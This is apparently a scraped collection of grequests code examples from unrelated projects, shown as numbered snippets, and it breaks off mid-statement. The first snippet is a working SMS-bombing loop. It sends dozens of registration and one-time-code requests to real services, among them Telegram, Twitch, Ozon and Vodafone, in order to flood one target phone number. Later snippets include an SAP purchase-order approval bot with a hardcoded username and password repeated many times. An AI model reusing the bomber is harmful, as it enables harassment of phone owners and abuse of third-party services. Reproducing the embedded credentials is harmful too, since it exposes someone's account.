    username = GenerateInfo().username()

    email = GenerateInfo().email()

    vodafone = (f"+{phone[:2]}(" + f"{phone[2:5]}) " + f"{phone[5:8]}-" +
                f"{phone[8:10]}-" + f"{phone[10:12]}")

    russian_name = GenerateInfo().russian_name()

    iteration = 0

    while iteration < count:

        requests = [
            grequests.head(
                "https://secure.online.ua/ajax/check_phone/",
                params={"reg_phone": "+" + phone},
                headers=head,
            ),
            grequests.post(
                "https://www.ozon.ru/api/composer-api.bx/_action/fastEntry",
                json={
                    "phone": phone,
                    "otpId": 0
                },
                headers=head,
            ),
            grequests.post(
                "http://www.vodafone.ua/shop/ru/vodafone_customer/register/sendSms/",
                data={
                    "is_ajax": "true",
                    "phone_number": vodafone,
                },
                headers=head,
            ),
            grequests.post(
                "https://uklon.com.ua/api/v1/account/code/send",
                headers=uklon1,
                json={"phone": phone},
            ),
            grequests.post(
                "https://partner.uklon.com.ua/api/v1/registration/sendcode",
                headers=uklon2,
                json={"phone": phone},
            ),
            grequests.post(
                "https://www.moyo.ua/identity/registration",
                data={
                    "firstname": russian_name,
                    "phone": phone,
                    "email": email,
                },
                headers=head,
            ),
            grequests.post(
                "https://koronapay.com/transfers/online/api/users/otps",
                data={"phone": phone},
                headers=head,
            ),
            grequests.post(
                "https://n13423.yclients.com/api/v1/book_code/312054",
                data=json.dumps({"phone": phone}),
                headers=frisor,
            ),
            grequests.post(
                "https://kasta.ua/api/v2/login/",
                data={"phone": phone},
                headers=head,
            ),
            grequests.post(
                "https://izi.ua/api/auth/register",
                json={
                    "phone": "+" + phone,
                    "name": russian_name,
                    "is_terms_accepted": "true",
                },
                headers=head,
            ),
            grequests.post(
                "https://junker.kiev.ua/postmaster.php",
                data={
                    "tel": phone[2:],
                    "name": username,
                    "action": "callme",
                },
                headers=head,
            ),
            grequests.post(
                "https://allo.ua/ua/customer/account/createPostVue/?currentTheme=main&currentLocale=uk_UA",
                data={
                    "firstname": russian_name,
                    "telephone": phone,
                    "email": email,
                    "password": password,
                    "form_key": "Zqqj7CyjkKG2ImM8",
                },
                headers=head,
            ),
            grequests.post(
                "https://stores-api.zakaz.ua/user/signup/",
                json={"phone": phone},
                headers=zakaz,
            ),
            grequests.post(
                "https://youla.ru/web-api/auth/request_code",
                data={"phone": phone},
                headers=head,
            ),
            grequests.post(
                "https://cloud.mail.ru/api/v2/notify/applink",
                json={
                    "phone": "+" + phone,
                    "api": 2,
                    "email": email,
                    "x-email": "x-email",
                },
                headers=head,
            ),
            grequests.post(
                "https://myapi.beltelecom.by/api/v1/auth/check-phone?lang=ru",
                data={"phone": phone},
                headers=head,
            ),
            grequests.post(
                url=
                f"https://www.sportmaster.ua/?module=users&action=SendSMSReg&phone=+{phone}",
                headers=head,
            ),
            grequests.post(
                "https://crm.getmancar.com.ua/api/veryfyaccount",
                json={
                    "phone": "+" + phone,
                    "grant_type": "password",
                    "client_id": "gcarAppMob",
                    "client_secret": "SomeRandomCharsAndNumbersMobile",
                },
                headers=head,
            ),
            grequests.post(
                "https://www.icq.com/smsreg/requestPhoneValidation.php",
                data={
                    "msisdn": phone,
                    "locale": "en",
                    "countryCode": "ru",
                    "version": "1",
                    "k": "ic1rtwz1s1Hj1O0r",
                    "r": "46763",
                },
                headers=head,
            ),
            grequests.post(
                "https://api.pozichka.ua/v1/registration/send",
                json={"RegisterSendForm": {
                    "phone": "+" + phone
                }},
                headers=head,
            ),
            grequests.post(
                "https://register.sipnet.ru/cgi-bin/exchange.dll/RegisterHelper",
                params={
                    "oper": 9,
                    "callmode": 1,
                    "phone": "+" + phone
                },
                headers=head,
            ),
            grequests.post(
                "https://city24.ua/personalaccount/account/registration",
                data={"PhoneNumber": phone},
                headers=head,
            ),
            grequests.post(
                "https://helsi.me/api/healthy/accounts/login",
                json={
                    "phone": phone,
                    "platform": "PISWeb"
                },
                headers=head,
            ),
            grequests.post(
                "https://cloud.mail.ru/api/v2/notify/applink",
                json={
                    "phone": "+" + phone,
                    "api": 2,
                    "email": email
                },
                headers=head,
            ),
            grequests.post(
                "https://auth.multiplex.ua/login",
                json={"login": phone},
                headers=head,
            ),
            grequests.post(
                "https://account.my.games/signup_send_sms/",
                data={"phone": phone},
                headers=head,
            ),
            grequests.post(
                "https://cabinet.planetakino.ua/service/sms",
                params={"phone": phone},
                headers=head,
            ),
            grequests.post(
                "https://youla.ru/web-api/auth/request_code",
                data={"phone": phone},
                headers=head,
            ),
            grequests.post(
                "https://rutube.ru/api/accounts/sendpass/phone",
                data={"phone": "+" + phone},
                headers=head,
            ),
            grequests.post(
                "https://www.mvideo.ru/internal-rest-api/common/atg/rest/actors/VerificationActor/getCode",
                params={"pageName": "registerPrivateUserPhoneVerificatio"},
                data={
                    "phone": phone,
                    "recaptcha": "off",
                    "g-recaptcha-response": ""
                },
                headers=head,
            ),
            grequests.post(
                "https://passport.twitch.tv/register?trusted_request=true",
                json={
                    "birthday": {
                        "day": 12,
                        "month": 10,
                        "year": 2000
                    },
                    "client_id": "kd1unb4b3q4t58fwlpcbzcbnm76a8fp",
                    "include_verification_code": True,
                    "password": password,
                    "phone_number": phone,
                    "username": username,
                },
                headers=head,
            ),
            grequests.post(
                "https://lk.belkacar.ru/register",
                data={"phone": "+" + phone},
                headers=head,
            ),
            grequests.post(
                "https://api.ivi.ru/mobileapi/user/register/phone/v6",
                data={"phone": phone},
                headers=head,
            ),
            grequests.post(
                "https://lk.belkacar.ru/get-confirmation-code",
                data={"phone": "+" + phone},
                headers=head,
            ),
            grequests.post(
                "https://secure.online.ua/ajax/check_phone/",
                params={"reg_phone": phone},
                header=head,
            ),
            grequests.post(
                "https://api.delitime.ru/api/v2/signup",
                data={
                    "SignupForm[username]": phone,
                    "SignupForm[device_type]": 3
                },
                headers=head,
            ),
            grequests.post(
                "https://apteka366.ru/login/register/sms/send",
                data={"phone": phone},
                headers=head,
            ),
            grequests.head(
                "https://fundayshop.com/ru/ru/secured/myaccount/myclubcard/resultClubCard.jsp?type=sendConfirmCode&phoneNumber={}"
                .format("+" + phone),
                headers=head,
            ),
            grequests.post(
                "https://gorzdrav.org/login/register/sms/send",
                data={"phone": phone},
                headers=head,
            ),
            grequests.post(
                "https://eda.yandex/api/v1/user/request_authentication_code",
                json={"phone_number": phone},
                headers=head,
            ),
            grequests.post(
                "https://eda.yandex/api/v1/user/request_authentication_code",
                json={"phone_number": "+" + phone},
                headers=head,
            ),
            grequests.post(
                "https://my.dianet.com.ua/send_sms/",
                data={"phone": phone},
                headers=head,
            ),
            grequests.post(
                "https://shafa.ua/api/v3/graphiql",
                json={
                    "operationName":
                    "RegistrationSendSms",
                    "variables": {
                        "phoneNumber": "+" + phone
                    },
                    "query":
                    "mutation RegistrationSendSms($phoneNumber: String!) {\n  unauthorizedSendSms(phoneNumber: $phoneNumber) {\n    isSuccess\n    userToken\n    errors {\n      field\n      messages {\n        message\n        code\n        __typename\n      }\n      __typename\n    }\n    __typename\n  }\n}\n",
                },
                headers=head,
            ),
            grequests.post(
                "https://my.telegram.org/auth/send_password",
                data={"phone": "+" + phone},
                headers=head,
            ),
            grequests.head(
                f"https://cabinet.planetakino.ua/service/sms?phone={phone}",
                headers=head,
            ),
            grequests.post(
                "https://api.boosty.to/oauth/phone/authorize",
                data={"client_id": "+" + phone},
                headers=head,
            ),
            grequests.post(
                "https://md-fashion.com.ua/bpm/validate-contact",
                data={"phone": "+" + phone},
                headers=head,
            ),
        ]

        grequests.map(requests, gtimeout=3)

        iteration += 1

        if iteration >= 5 and count >= 10:

            sleep(randint(2, 4))

        print(
            f"\033[1;{choice(['32m', '33m', '34m', '35m', '36m'])}{iteration}/{count} кругов"
        )
Example #29
0
def thumb(request):

    # get the width height and source
    width = int(request.GET.get('width', 0))
    height = int(request.GET.get('height', 0))
    src = request.GET.get('src')

    # only continue if they passed a source
    if src:
        # the parts of our url
        parts = src.split('/')

        # some logical size limits
        if width > settings.MAX_IMAGE_SIZE:
            width = settings.MAX_IMAGE_SIZE

        if height > settings.MAX_IMAGE_SIZE:
            height = settings.MAX_IMAGE_SIZE

        # get the stuff we need out of our parts
        bucket = parts[3]
        filename = parts[-1]
        ext = filename.split('.')[-1]

        # create a thumbname for the image
        thumb_name = '%s_thumber_%s_%s.%s' % (''.join(
            filename.split('.')[0:-1]), width, height, ext)
        thumb_src = '%s/_thumber/%s' % ('/'.join(parts[0:-1]), thumb_name)

        # put the thumbs in a dir called _thumber
        thumb_path = '/%s/_thumber/%s' % ('/'.join(parts[4:-1]), thumb_name)

        response = None

        # check to see if our thumb exists with a head request
        def exception_handle(req, exception):
            global response
            response = None

        #response = urllib2.urlopen(HeadRequest(thumb_src))
        response = grequests.map([grequests.head(thumb_src)], )

        if response[0].status_code >= 400:
            response = None

        # PROCESS THE IMAGE HERE
        # handle the image being missing
        # this is where we actually do the image thumbing and upload it to amazon
        if not response:

            # setup a place to store the local file and download it
            local_thumb_path = 'tmp/' + filename

            def exception_handler_image(req, exception):
                logger.debug("Image does not exist")
                logger.exception(exception)
                raise Http404

                #image = urllib2.urlopen(src)

            image = grequests.map([grequests.get(src)])
            #except urllib2.HTTPError, e:

            # write out the file
            with open(local_thumb_path, 'wb') as f:
                f.write(image[0].read())

            # do the resizing, save our image
            image = Image.open(local_thumb_path)
            image = image.resize((width, height), Image.ANTIALIAS)
            image.save(local_thumb_path)

            # send it back to where it came from
            upload_image(local_thumb_path, thumb_path, bucket)

        return redirect(thumb_src)
Example #30
0
 def head(self, url, **kwargs):
     """HTTP HEAD Method."""
     kwargs['auth'] = self.auth
     req = grequests.head(url, **kwargs)
     return self._run(req)
Example #31
0
def query_get_task_with_details(bot_memo, present_skill, bot_nlp):

    if ((bot_memo == {} or bot_memo['index']) and present_skill == 'get_task'):

        #requests can be used for synchronous requests
        # r = requests.get("https://p2001172697trial-trial.apim1.hanatrial.ondemand.com/p2001172697trial/Workflow_approval/TaskCollection?sap-client=400&$filter=Status%20eq%20%27READY%27&$format=json", auth=HTTPBasicAuth('pritamsa', 'rupu@0801'))
        # body1 = r.json()

        #grequests is faster
        url1 = [
            "https://p2001172697trial-trial.apim1.hanatrial.ondemand.com/p2001172697trial/Workflow_approval/TaskCollection?sap-client=400&$filter=Status%20eq%20%27READY%27&$format=json"
        ]
        rs1 = (grequests.get(u, auth=('pritamsa', 'rupu@0801')) for u in url1)
        #both imap and map can be used
        #reque = grequests.imap(rs,size=1)
        reque1 = grequests.map(rs1, size=1)
        response_array1 = []
        for response1 in reque1:
            print(response1)
            x1 = response1.json()
            response_array1.append(x1)
        body1 = response_array1[0]

        no_of_tasks = len(body1["d"]["results"])
        if (body1["d"]["results"]):
            #task details
            instance_id = body1["d"]["results"][0]["InstanceID"]
            task_title = body1["d"]["results"][0]["TaskTitle"]

            scrapped_po_no = task_title.split("order ", 1)[1]

            body2, body3 = take_action_async(scrapped_po_no)

            #po_header detail
            created_by_user = body2["d"]["CreatedByUser"]
            SupplierName = body2["d"]["SupplierName"]
            PurchaseOrderNetAmount = body2["d"]["PurchaseOrderNetAmount"]
            DocumentCurrency = body2["d"]["DocumentCurrency"]
            PurchaseOrderNetAmount = body2["d"]["PurchaseOrderNetAmount"]

            final_reply_string = ''
            concat_string_for_multiple_lineitems = ''
            per_item_desc_dict = {}
            all_item_details = {}
            #po item detail
            no_of_line_items = len(body3["d"]["results"])
            for i in range(no_of_line_items):
                Material = body3["d"]["results"][i]["Material_Text"]
                Plant = body3["d"]["results"][i]["Plant"]
                OrderQuantity = body3["d"]["results"][i]["OrderQuantity"]
                netPriceItem = body3["d"]["results"][i]["NetPriceAmount"]
                documentCurrency = body3["d"]["results"][i]["DocumentCurrency"]
                price_present_item_with_currency = netPriceItem + documentCurrency

                item_no = 'item : ' + str(i + 1)
                # print(item_no)
                #item_no = dict(item_no)
                per_item_desc_dict = {
                    item_no: {
                        'Material': Material,
                        'Plant': Plant,
                        'OrderQuantity': OrderQuantity,
                        'netPriceItem': price_present_item_with_currency
                    }
                }
                all_item_details.update(per_item_desc_dict)

                #use this when sending the item details as string all in one reply
                # concat_string_for_multiple_lineitems = concat_string_for_multiple_lineitems \
                #     + 'Material: ' + Material + '.\n' + 'plant: ' + Plant + '.\n' \
                #     + 'OrderQuantity: ' + OrderQuantity + '.\n'

            get_task_string = ''
            get_task_string_with_header_detail = ''

            get_task_string = task_title + '.' + '\n'

            get_task_string_with_header_detail = 'created by user: '******'.' + '\n' + 'SupplierName: ' + SupplierName \
                    + '.' + '\n' + 'PurchaseOrderNetAmount: ' + PurchaseOrderNetAmount + ' ' + DocumentCurrency + '.'+'\n'

            #final_reply_string = 'Now you have got, '+ str(no_of_tasks) + ' pending tasks to approve. ' + get_task_string + get_task_string_with_header_detail +'You have: ' + str(no_of_line_items) +' items.\n'+ concat_string_for_multiple_lineitems + " say approve to approve this task or say ignore to skip this task and move on to your next task, or say next to get your next task with details."
            final_reply_string = 'Now you have got, ' + str(
                no_of_tasks
            ) + ' pending tasks to approve. ' + get_task_string + get_task_string_with_header_detail + 'You have: ' + str(
                no_of_line_items
            ) + ' items.\n' + " say get item details to get all the item details in this purchase order. Or,say approve to approve this task or say ignore to skip this task and move on to your next task, or say next to get your next task with details."

            return final_reply_string, 1, instance_id, created_by_user, SupplierName, (
                PurchaseOrderNetAmount + ' ' + DocumentCurrency
            ), '', all_item_details, no_of_line_items, scrapped_po_no  #return 1for memory index as no memo is present in the beggining

        else:
            final_reply_string = 'no more tasks to approve in your inbox.'
            return final_reply_string, 1, bot_memo, bot_memo, bot_memo, bot_memo, '', '', '', bot_memo

    elif (
        (bot_memo['index']) and
        (present_skill == 'get_next_task' or present_skill == 'ignore_task')):
        #requests can be used for synchronous requests
        # r = requests.get("https://p2001172697trial-trial.apim1.hanatrial.ondemand.com/p2001172697trial/Workflow_approval/TaskCollection?sap-client=400&$filter=Status%20eq%20%27READY%27&$format=json", auth=HTTPBasicAuth('pritamsa', 'rupu@0801'))
        # body1 = r.json()

        #grequests is faster
        url1 = [
            "https://p2001172697trial-trial.apim1.hanatrial.ondemand.com/p2001172697trial/Workflow_approval/TaskCollection?sap-client=400&$filter=Status%20eq%20%27READY%27&$format=json"
        ]
        rs1 = (grequests.get(u, auth=('pritamsa', 'rupu@0801')) for u in url1)
        #both imap and map can be used
        #reque = grequests.imap(rs,size=1)
        reque1 = grequests.map(rs1, size=1)
        response_array1 = []
        for response1 in reque1:
            print(response1)
            x1 = response1.json()
            response_array1.append(x1)
        body1 = response_array1[0]
        no_of_tasks = len(body1["d"]["results"])
        if ((len(body1["d"]["results"]) == 1)):

            instance_id = body1["d"]["results"][0]["InstanceID"]
            task_title = body1["d"]["results"][0]["TaskTitle"]

            scrapped_po_no = task_title.split("order ", 1)[1]

            body2, body3 = take_action_async(scrapped_po_no)

            #po_header detail
            created_by_user = body2["d"]["CreatedByUser"]
            SupplierName = body2["d"]["SupplierName"]
            PurchaseOrderNetAmount = body2["d"]["PurchaseOrderNetAmount"]
            DocumentCurrency = body2["d"]["DocumentCurrency"]
            PurchaseOrderNetAmount = body2["d"]["PurchaseOrderNetAmount"]

            final_reply_string = ''
            concat_string_for_multiple_lineitems = ''
            per_item_desc_dict = {}
            all_item_details = {}

            #po item detail
            no_of_line_items = len(body3["d"]["results"])
            for i in range(no_of_line_items):
                Material = body3["d"]["results"][i]["Material_Text"]
                Plant = body3["d"]["results"][i]["Plant"]
                OrderQuantity = body3["d"]["results"][i]["OrderQuantity"]
                netPriceItem = body3["d"]["results"][i]["NetPriceAmount"]
                documentCurrency = body3["d"]["results"][i]["DocumentCurrency"]
                price_present_item_with_currency = netPriceItem + documentCurrency

                item_no = 'item : ' + str(i + 1)
                # print(item_no)
                #item_no = dict(item_no)
                per_item_desc_dict = {
                    item_no: {
                        'Material': Material,
                        'Plant': Plant,
                        'OrderQuantity': OrderQuantity,
                        'netPriceItem': price_present_item_with_currency
                    }
                }
                all_item_details.update(per_item_desc_dict)

                #use this when sending the item details as string all in one reply
                # concat_string_for_multiple_lineitems = concat_string_for_multiple_lineitems \
                #     + 'Material: ' + Material + '.\n' + 'plant: ' + Plant + '.\n' \
                #     + 'OrderQuantity: ' + OrderQuantity + '.\n'

            get_task_string = ''
            get_task_string_with_header_detail = ''

            get_task_string = task_title + '.' + '\n'

            get_task_string_with_header_detail = 'created by user: '******'.' + '\n' + 'SupplierName: ' + SupplierName \
                    + '.' + '\n' + 'PurchaseOrderNetAmount: ' + PurchaseOrderNetAmount + ' ' + DocumentCurrency + '.'+'\n'

            # final_reply_string = 'Now you have got, '+ str(no_of_tasks) + ' pending tasks to approve. ' + get_task_string + get_task_string_with_header_detail +'You have: ' + str(no_of_line_items) +' items.\n'+ concat_string_for_multiple_lineitems + " say approve to approve this task or say ignore to skip this task and move on to your next task, or say next to get your next task with details."
            final_reply_string = 'Now you have got, ' + str(
                no_of_tasks
            ) + ' pending tasks to approve. ' + get_task_string + get_task_string_with_header_detail + 'You have: ' + str(
                no_of_line_items
            ) + ' items.\n' + " say get item details to get all the item details in this purchase order. Or,say approve to approve this task or say ignore to skip this task and move on to your next task, or say next to get your next task with details."

            return final_reply_string, 1, instance_id, created_by_user, SupplierName, (
                PurchaseOrderNetAmount + ' ' + DocumentCurrency
            ), '', all_item_details, no_of_line_items, scrapped_po_no  #return 1for memory index as no memo is present in the beggining

        elif ((len(body1["d"]["results"]) > 1)
              and bot_memo['index'] < len(body1["d"]["results"])):
            #task details
            instance_id = body1["d"]["results"][
                bot_memo['index']]["InstanceID"]
            task_title = task_title = body1["d"]["results"][
                bot_memo['index']]["TaskTitle"]
            #print(task_title)
            scrapped_po_no = task_title.split("order ", 1)[1]
            #print(scrapped_po_no)

            body2, body3 = take_action_async(scrapped_po_no)

            #po_header detail
            created_by_user = body2["d"]["CreatedByUser"]
            SupplierName = body2["d"]["SupplierName"]
            PurchaseOrderNetAmount = body2["d"]["PurchaseOrderNetAmount"]
            DocumentCurrency = body2["d"]["DocumentCurrency"]
            PurchaseOrderNetAmount = body2["d"]["PurchaseOrderNetAmount"]

            final_reply_string = ''
            concat_string_for_multiple_lineitems = ''
            per_item_desc_dict = {}
            all_item_details = {}

            #po item detail
            #only show one or two tasks
            no_of_line_items = len(body3["d"]["results"])
            for i in range(no_of_line_items):
                Material = body3["d"]["results"][i]["Material_Text"]
                Plant = body3["d"]["results"][i]["Plant"]
                OrderQuantity = body3["d"]["results"][i]["OrderQuantity"]
                netPriceItem = body3["d"]["results"][i]["NetPriceAmount"]
                documentCurrency = body3["d"]["results"][i]["DocumentCurrency"]
                price_present_item_with_currency = netPriceItem + documentCurrency

                item_no = 'item : ' + str(i + 1)
                # print(item_no)
                #item_no = dict(item_no)
                per_item_desc_dict = {
                    item_no: {
                        'Material': Material,
                        'Plant': Plant,
                        'OrderQuantity': OrderQuantity,
                        'netPriceItem': price_present_item_with_currency
                    }
                }
                all_item_details.update(per_item_desc_dict)

                #use this when sending the item details as string all in one reply
                # concat_string_for_multiple_lineitems = concat_string_for_multiple_lineitems \
                #     + 'Material: ' + Material + '.\n' + 'plant: ' + Plant + '.\n' \
                #     + 'OrderQuantity: ' + OrderQuantity + '.\n'

            get_task_string = ''
            get_task_string_with_header_detail = ''

            get_task_string = task_title + '.' + '\n'

            get_task_string_with_header_detail = 'created by user: '******'.' + '\n' + 'SupplierName: ' + SupplierName \
                    + '.' + '\n' + 'PurchaseOrderNetAmount: ' + PurchaseOrderNetAmount + ' ' + DocumentCurrency + '.'+'\n'

            # final_reply_string = get_task_string + get_task_string_with_header_detail +'You have: ' + str(no_of_line_items) +' items in this P.O.\n'+ concat_string_for_multiple_lineitems + " say approve to approve this task or say ignore to skip this task and move on to your next task, or say next to get your next task with details."
            final_reply_string = 'Now you have got, ' + str(
                no_of_tasks
            ) + ' pending tasks to approve. ' + get_task_string + get_task_string_with_header_detail + 'You have: ' + str(
                no_of_line_items
            ) + ' items.\n' + " say get item details to get all the item details in this purchase order. Or,say approve to approve this task or say ignore to skip this task and move on to your next task, or say next to get your next task with details."

            #print(get_task_string)

            #print(final_reply_string)
            return final_reply_string, bot_memo[
                'index'] + 1, instance_id, created_by_user, SupplierName, (
                    PurchaseOrderNetAmount + ' ' + DocumentCurrency
                ), '', all_item_details, no_of_line_items, scrapped_po_no

        elif (len(body1["d"]["results"]) > 0) and (bot_memo['index'] >= len(
                body1["d"]["results"])):

            final_reply_string = 'no more tasks to approve in your inbox.'
            return final_reply_string, bot_memo['index'], len(
                body1["d"]["results"]
            ), bot_memo['created_by'], bot_memo['SupplierName'], bot_memo[
                'PurchaseOrderNetAmount'], '', '', '', bot_memo[
                    'scrapped_po_no']

        else:

            final_reply_string = 'I think there are no more pending approvals for you. Say, "get my tasks", to get your pending approvals.'
            return final_reply_string, bot_memo['index'], len(
                body1["d"]["results"]
            ), bot_memo['created_by'], bot_memo['SupplierName'], bot_memo[
                'PurchaseOrderNetAmount'], '', '', '', bot_memo[
                    'scrapped_po_no']

    #repeat intent is handled via bot memory not via code

    # elif((bot_memo['index']) and present_skill == 'repeat'):

    #     r = requests.get("https://p2001172697trial-trial.apim1.hanatrial.ondemand.com/p2001172697trial/Workflow_approval/TaskCollection?sap-client=400&$filter=Status%20eq%20%27READY%27&$format=json", auth=HTTPBasicAuth('pritamsa', 'rupu@0801'))
    #     body1 = r.json()
    #     if (body1["d"]["results"] and bot_memo['index'] <= len(body1["d"]["results"])):
    #         #task details
    #         instance_id = body1["d"]["results"][bot_memo['index']-1]["InstanceID"]
    #         task_title = body1["d"]["results"][bot_memo['index']-1]["TaskTitle"]

    #         scrapped_po_no = task_title.split("order ",1)[1]

    #         body2,body3 = take_action_async(scrapped_po_no)

    #         #po_header detail
    #         created_by_user = body2["d"]["CreatedByUser"]
    #         SupplierName = body2["d"]["SupplierName"]
    #         PurchaseOrderNetAmount = body2["d"]["PurchaseOrderNetAmount"]
    #         DocumentCurrency = body2["d"]["DocumentCurrency"]
    #         PurchaseOrderNetAmount = body2["d"]["PurchaseOrderNetAmount"]

    #         final_reply_string = ''
    #         concat_string_for_multiple_lineitems = ''

    #         #po item detail
    #         #only show one or two tasks
    #         no_of_line_items = len(body3["d"]["results"])
    #         for i in range(no_of_line_items):
    #             Material = body3["d"]["results"][i]["Material_Text"]
    #             Plant = body3["d"]["results"][i]["Plant"]
    #             OrderQuantity = body3["d"]["results"][i]["OrderQuantity"]

    #             concat_string_for_multiple_lineitems = concat_string_for_multiple_lineitems \
    #                 + 'Material: ' + Material + '.\n' + 'plant: ' + Plant + '.\n' \
    #                 + 'OrderQuantity: ' + OrderQuantity + '.\n'

    #         get_task_string = ''
    #         get_task_string_with_header_detail = ''

    #         get_task_string = task_title + '\n'

    #         get_task_string_with_header_detail = 'created_by_user: '******'.' +'\n' + 'SupplierName: ' + SupplierName \
    #              +'.'   + '\n' + 'PurchaseOrderNetAmount: ' + PurchaseOrderNetAmount + ' ' + DocumentCurrency + '.' +'\n'

    #         final_reply_string = get_task_string + get_task_string_with_header_detail +'You have: ' + str(no_of_line_items) +' items\n'+ concat_string_for_multiple_lineitems + " say approve to approve this task or say ignore to skip this task and move on to your next task, or say next to get your next task with details."
    #         #print(get_task_string)

    #         #print(final_reply_string)
    #         return final_reply_string,bot_memo['index'],instance_id,created_by_user,SupplierName, (PurchaseOrderNetAmount + ' ' + DocumentCurrency)

    #     elif(body1["d"]["results"] and bot_memo['index'] >= len(body1["d"]["results"])):
    #         final_reply_string = 'no more tasks to approve...'
    #         return final_reply_string,bot_memo['index'],len(body1["d"]["results"]),created_by_user,SupplierName, (PurchaseOrderNetAmount + ' ' + DocumentCurrency)

    #     else:
    #         final_reply_string = 'I am facing some issues now please try later'
    #         return final_reply_string,bot_memo['index'],len(body1["d"]["results"]),created_by_user,SupplierName, (PurchaseOrderNetAmount + ' ' + DocumentCurrency)

    elif ((bot_memo['index']) and present_skill == 'approve'):
        after_approval_reply = 'successfully approved, please say,"get my tasks", to get your previous pending aapprovals from the beggining, or, say next to move on to your next task.'
        approval_failure_reply = "there was an issue with the server, Please try again later to approve..."
        session = requests.Session()
        header = {'x-csrf-token': 'Fetch'}
        present_task_instance_id = bot_memo['instanceID']

        # response = session.head("https://p2001172697trial-trial.apim1.hanatrial.ondemand.com/p2001172697trial/Workflow_approval/TaskCollection?sap-client=400&$filter=Status%20eq%20%27READY%27&$format=json", auth=HTTPBasicAuth('pritamsa', 'rupu@0801'),headers=header)
        # if (response.status_code != 200):
        #     return approval_failure_reply ,bot_memo['index'],present_task_instance_id,bot_memo['created_by'],bot_memo['SupplierName'], bot_memo['PurchaseOrderNetAmount'],approval_failure_reply,'','',bot_memo['scrapped_po_no']
        # elif (response.status_code == 200):
        #     cookie = session.cookies.get_dict()
        #     print(cookie)

        #     csrf = response.headers['x-csrf-token']
        #     #print(csrf)

        #     #post
        #     #approve
        #     header_2 = {'x-csrf-token':csrf}
        #     approve_po = session.post("https://p2001172697trial-trial.apim1.hanatrial.ondemand.com/p2001172697trial/Workflow_approval/Decision?sap-client=400&SAP__Origin='S4HMYINBOCLNT200'&InstanceID="+ "'"+present_task_instance_id +"'""&DecisionKey='0001'&Comments='test%20approve'",auth=HTTPBasicAuth('pritamsa', 'rupu@0801'),headers=header_2,cookies=cookie)

        #     print('***************************************************************')
        #     print(approve_po.status_code)

        # approval request posted asynchronously
        url3 = [
            "https://p2001172697trial-trial.apim1.hanatrial.ondemand.com/p2001172697trial/Workflow_approval/TaskCollection?sap-client=400&$filter=Status%20eq%20%27READY%27&$format=json"
        ]
        head_res1 = (grequests.head(u,
                                    auth=('pritamsa', 'rupu@0801'),
                                    headers=header) for u in url3)
        #both imap and map can be used
        #reque = grequests.imap(rs,size=1)
        reque3 = grequests.map(head_res1, size=1)
        response_array3 = []
        for response3 in reque3:

            if (response3.status_code != 200):
                print("hey problem")
                return approval_failure_reply, bot_memo[
                    'index'], present_task_instance_id, bot_memo[
                        'created_by'], bot_memo['SupplierName'], bot_memo[
                            'PurchaseOrderNetAmount'], approval_failure_reply, '', '', bot_memo[
                                'scrapped_po_no']
            else:
                cookie = response3.cookies.get_dict()
                print(cookie)

                csrf = response3.headers['x-csrf-token']
                print(csrf)

                header_2 = {'x-csrf-token': csrf}

                url_post = [
                    "https://p2001172697trial-trial.apim1.hanatrial.ondemand.com/p2001172697trial/Workflow_approval/Decision?sap-client=400&SAP__Origin='S4HMYINBOCLNT200'&InstanceID="
                    + "'" + present_task_instance_id + "'"
                    "&DecisionKey='0001'&Comments='test%20approve'"
                ]
                post_res = (grequests.post(u_post,
                                           auth=('pritamsa', 'rupu@0801'),
                                           headers=header_2,
                                           cookies=cookie)
                            for u_post in url_post)

                post_reque = grequests.map(post_res, size=1)
                response_array_post = []
                for response_post in post_reque:

                    if (response_post.status_code != 200):
                        print(
                            "hey problem in approving the request. Please try again later."
                        )
                        return approval_failure_reply, bot_memo[
                            'index'], present_task_instance_id, bot_memo[
                                'created_by'], bot_memo['SupplierName'], bot_memo[
                                    'PurchaseOrderNetAmount'], approval_failure_reply, '', '', bot_memo[
                                        'scrapped_po_no']

                    else:

                        return after_approval_reply, bot_memo[
                            'index'], present_task_instance_id, bot_memo[
                                'created_by'], bot_memo['SupplierName'], bot_memo[
                                    'PurchaseOrderNetAmount'], after_approval_reply, '', '', bot_memo[
                                        'scrapped_po_no']  #after this call the "next" task showing skill in bot

    elif ((bot_memo['index']) and present_skill == 'reject'):
        after_rejection_reply = 'successfully rejected, please say,"get my tasks", to get your previous pending aapprovals from the beggining, or, say next to move on to your next task.'
        rejection_failure_reply = "there was an issue with the server, Please try again later to approve..."
        session = requests.Session()
        header = {'x-csrf-token': 'Fetch'}
        present_task_instance_id = bot_memo['instanceID']

        # response = session.head("https://p2001172697trial-trial.apim1.hanatrial.ondemand.com/p2001172697trial/Workflow_approval/TaskCollection?sap-client=400&$filter=Status%20eq%20%27READY%27&$format=json", auth=HTTPBasicAuth('pritamsa', 'rupu@0801'),headers=header)
        # if (response.status_code != 200):
        #     return approval_failure_reply ,bot_memo['index'],present_task_instance_id,bot_memo['created_by'],bot_memo['SupplierName'], bot_memo['PurchaseOrderNetAmount'],approval_failure_reply,'','',bot_memo['scrapped_po_no']
        # elif (response.status_code == 200):
        #     cookie = session.cookies.get_dict()
        #     print(cookie)

        #     csrf = response.headers['x-csrf-token']
        #     #print(csrf)

        #     #post
        #     #approve
        #     header_2 = {'x-csrf-token':csrf}
        #     approve_po = session.post("https://p2001172697trial-trial.apim1.hanatrial.ondemand.com/p2001172697trial/Workflow_approval/Decision?sap-client=400&SAP__Origin='S4HMYINBOCLNT200'&InstanceID="+ "'"+present_task_instance_id +"'""&DecisionKey='0001'&Comments='test%20approve'",auth=HTTPBasicAuth('pritamsa', 'rupu@0801'),headers=header_2,cookies=cookie)

        #     print('***************************************************************')
        #     print(approve_po.status_code)

        # approval request posted asynchronously
        url4 = [
            "https://p2001172697trial-trial.apim1.hanatrial.ondemand.com/p2001172697trial/Workflow_approval/TaskCollection?sap-client=400&$filter=Status%20eq%20%27READY%27&$format=json"
        ]
        head_res4 = (grequests.head(u,
                                    auth=('pritamsa', 'rupu@0801'),
                                    headers=header) for u in url4)
        #both imap and map can be used
        #reque = grequests.imap(rs,size=1)
        reque4 = grequests.map(head_res4, size=1)
        response_array4 = []
        for response4 in reque4:

            if (response4.status_code != 200):
                print("hey problem")
                return rejection_failure_reply, bot_memo[
                    'index'], present_task_instance_id, bot_memo[
                        'created_by'], bot_memo['SupplierName'], bot_memo[
                            'PurchaseOrderNetAmount'], rejection_failure_reply, '', '', bot_memo[
                                'scrapped_po_no']
            else:
                cookie = response4.cookies.get_dict()
                print(cookie)

                csrf = response4.headers['x-csrf-token']
                print(csrf)

                header_2 = {'x-csrf-token': csrf}

                url_post = [
